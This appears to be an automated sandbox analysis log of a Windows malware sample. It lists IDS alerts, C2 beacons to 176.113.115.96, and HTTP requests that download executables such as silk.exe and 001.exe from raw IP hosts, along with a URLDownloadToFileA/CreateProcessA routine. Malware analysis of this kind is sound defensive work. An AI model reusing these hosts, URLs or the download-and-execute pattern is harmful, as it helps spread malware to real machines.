            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49720 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49727 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49730 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49721 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49725 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49723 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49735 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49734 -> 176.113.115.96:443
            Source: global trafficHTTP traffic detected: GET /forsale/silk.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 91.240.118.49Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38f926d19fe6595cd66946851e91fcd85241ab258d81329326be8e343a8f51f8a95b5cd212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d4348dd7d5915c4eca HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38c926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38d926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38a926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38b926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb388926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb389926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb386926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb387926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38f842a1cec7a86d87bdb6546ad12dac0290dec1dd51729366be8eb43a8ec4cd78eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7731f8db05 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38f852a1cec7a86d87bdb6546ad12dac0290dec1dd51729366be8eb43a8ec4cd78eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7731f8db05 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38f862a1cec7a86d87bdb6546ad12dac0290dec1dd51729366be8eb43a8ec4cd78eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7731f8db05 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38f872a1cec7a86d87bdb6546ad12dac0290dec1dd51729366be8eb43a8ec4cd78eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7731f8db05 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38f802a1cec7a86d87bdb6546ad12dac0290dec1dd51729366be8eb43a8ec4cd78eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7731f8db05 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38f812a1cec7a86d87bdb6546ad12dac0290dec1dd51729366be8eb43a8ec4cd78eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7731f8db05 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38f822a1cec7a86d87bdb6546ad12dac0290dec1dd51729366be8eb43a8ec4cd78eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7731f8db05 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /001.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 104.168.28.10Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: HEAD /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=0-0User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=16384-32767User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=65536-81919User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=49152-65535User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=81920-98303User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=98304-114687User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=114688-131071User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=0-16383User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=32768-49151User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=131072-163839User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=163840-196607User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=196608-229375User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=229376-262143User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=262144-294911User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=294912-327679User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=327680-360447User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=360448-393215User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=393216-458751User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=458752-524287User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=524288-589823User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=589824-655359User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=655360-720895User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=720896-786431User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=786432-851967User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=851968-917503User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1048576-1179647User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1179648-1310719User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1310720-1441791User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=917504-1048575User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1441792-1572863User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1572864-1703935User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1703936-1835007User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1835008-1966079User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1966080-2228223User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=2228224-2490367User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=2752512-3014655User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=2490368-2752511User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=3014656-3276799User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=3276800-3538943User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=3538944-3801087User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=3801088-4063231User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=4063232-4587519User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=4587520-5111807User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=5111808-5636095User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=5636096-6160383User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=6160384-6684671User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=6684672-6763823User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: unknownTCP traffic detected without corresponding DNS query: 104.168.28.10
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_00402C60 CreateProcessA,CloseHandle,CloseHandle,CloseHandle,URLDownloadToFileA,0_2_00402C60
            Source: global trafficHTTP traffic detected: GET /forsale/silk.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 91.240.118.49Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38f926d19fe6595cd66946851e91fcd85241ab258d81329326be8e343a8f51f8a95b5cd212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d4348dd7d5915c4eca HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38c926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38d926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38a926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb38b926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb388926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb389926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae14615677411efa3231678fbb386926d19fe6595cd66946951e91fcd85250aef18d105672e26e5fd09b4a149c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bce7535ffde HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
